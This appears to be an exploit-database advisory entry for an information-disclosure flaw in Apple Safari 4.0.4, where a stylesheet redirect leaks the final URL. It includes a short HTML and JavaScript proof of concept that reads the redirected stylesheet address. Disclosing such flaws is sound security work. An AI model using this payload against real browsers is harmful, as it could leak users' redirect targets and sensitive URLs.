Apple Safari 4.0.4 – Style Sheet redirection Information Disclosure

  • 作者: Cesar Cerrudo
    日期: 2010-01-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33563/
  • source: https://www.securityfocus.com/bid/37925/info

Apple Safari is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>